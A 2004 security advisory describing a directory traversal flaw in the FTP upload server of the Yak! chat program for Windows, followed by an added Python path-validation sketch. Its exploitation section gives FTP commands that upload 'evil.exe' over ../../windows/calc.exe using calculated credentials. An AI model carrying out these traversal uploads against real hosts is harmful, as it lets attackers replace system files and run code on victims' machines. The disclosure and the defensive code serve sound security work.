packetstorm | Luigi Auriemma | PACKETSTORM:34741
History: Oct 26, 2004 - 12:00 a.m.

yak212.txt

`  
#######################################################################  
  
Luigi Auriemma  
  
Application: Yak!  
http://www.digicraft.com.au/yak/  
Versions: <= 2.1.2  
Platforms: Windows  
Bug: directory traversal (upload)  
Exploitation: remote  
Date: 15 October 2004  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: http://aluigi.altervista.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
Yak! is a serverless chat system for Windows that lets people chat  
and exchange files.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
When the program starts, it creates a username and password for each  
IP address of the computer's network interfaces.  
These credentials are needed to grant other Yak! hosts access to the  
built-in FTP server (used only to receive files).  
  
The problem lies in this FTP server: the input of the clients is not  
filtered, so it is possible to upload files anywhere on the disk that  
holds the Yak! upload directory (by default the system's temporary  
folder), overwriting existing files.  
  
Naturally, it is also possible to list any remote directory and file  
(although it seems only c: can be browsed, even if the upload folder is  
set on another disk), while downloading is prevented by the program  
because it has been designed to receive files only.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
Perform the following steps:  
  
Download my "Yak! username and password calculator"  
http://aluigi.altervista.org/papers/yakcalc.zip to retrieve the  
username and password needed to access the FTP server of a specific  
Yak! host.  
  
Then connect to the Yak! FTP port, usually 3535:  
  
C:\>ftp  
ftp> open HOST 3535  
  
Enter the calculated username and password and upload your files as  
in the following example:  
  
dir /  
dir ../../windows/  
  
put  
evil.exe  
../../windows/calc.exe  
  
(slash and backslash have the same effect)  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
The vendor was contacted exactly one month ago but no patch is  
available.  
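
The input filtering that section 2 says the FTP server lacks, sketched as an added example (not code from this advisory, its author, or the vendor): every client-supplied path is resolved against the upload directory and rejected if it ends up outside it, treating slash and backslash alike. The upload directory value and the names resolve_upload_path, is_allowed and PathRejected are assumptions made for the illustration.

```python
import ntpath  # Windows path rules, usable on any platform

# Constructed value: stands in for Yak!'s upload directory (an assumption).
UPLOAD_ROOT = r"C:\Users\alice\AppData\Local\Temp\yak"


class PathRejected(ValueError):
    """A client-supplied FTP path would leave the upload root."""


def resolve_upload_path(client_path, root=UPLOAD_ROOT):
    """Map a STOR/LIST/CWD argument to a path inside root, or raise."""
    if "\x00" in client_path or ":" in client_path:
        # NUL bytes, drive letters ("d:x") and NTFS streams ("f.txt:s").
        raise PathRejected("illegal character in %r" % client_path)
    # Slash and backslash are equivalent on Windows: unify before checking.
    unified = client_path.replace("/", "\\")
    # A leading separator means "top of the upload root", not "top of disk".
    relative = unified.lstrip("\\")
    root_abs = ntpath.normpath(root)
    # normpath collapses ".." lexically; links/junctions need an OS-level check.
    full = ntpath.normpath(ntpath.join(root_abs, relative))
    root_key = ntpath.normcase(root_abs)
    full_key = ntpath.normcase(full)
    # The trailing separator stops "yak-evil" from matching the root "yak".
    if full_key != root_key and not full_key.startswith(root_key + "\\"):
        raise PathRejected("%r escapes the upload root" % client_path)
    return full


def is_allowed(client_path):
    """True when the path resolves inside the upload root."""
    try:
        resolve_upload_path(client_path)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Constructed inputs, including the path forms from section 3.
    samples = ["photo.jpg", "sub/notes.txt", "/", "../../windows/",
               "../../windows/calc.exe", "..\\..\\windows\\calc.exe",
               "/../../windows/calc.exe", "c:/windows/calc.exe",
               "../yak-evil/x.txt"]
    for p in samples:
        print("%-30r %s" % (p, "ok" if is_allowed(p) else "REJECTED"))
```

The same resolver has to sit in front of directory listing as well as upload, since section 2 notes that both accept unfiltered paths.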
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.altervista.org  
  
`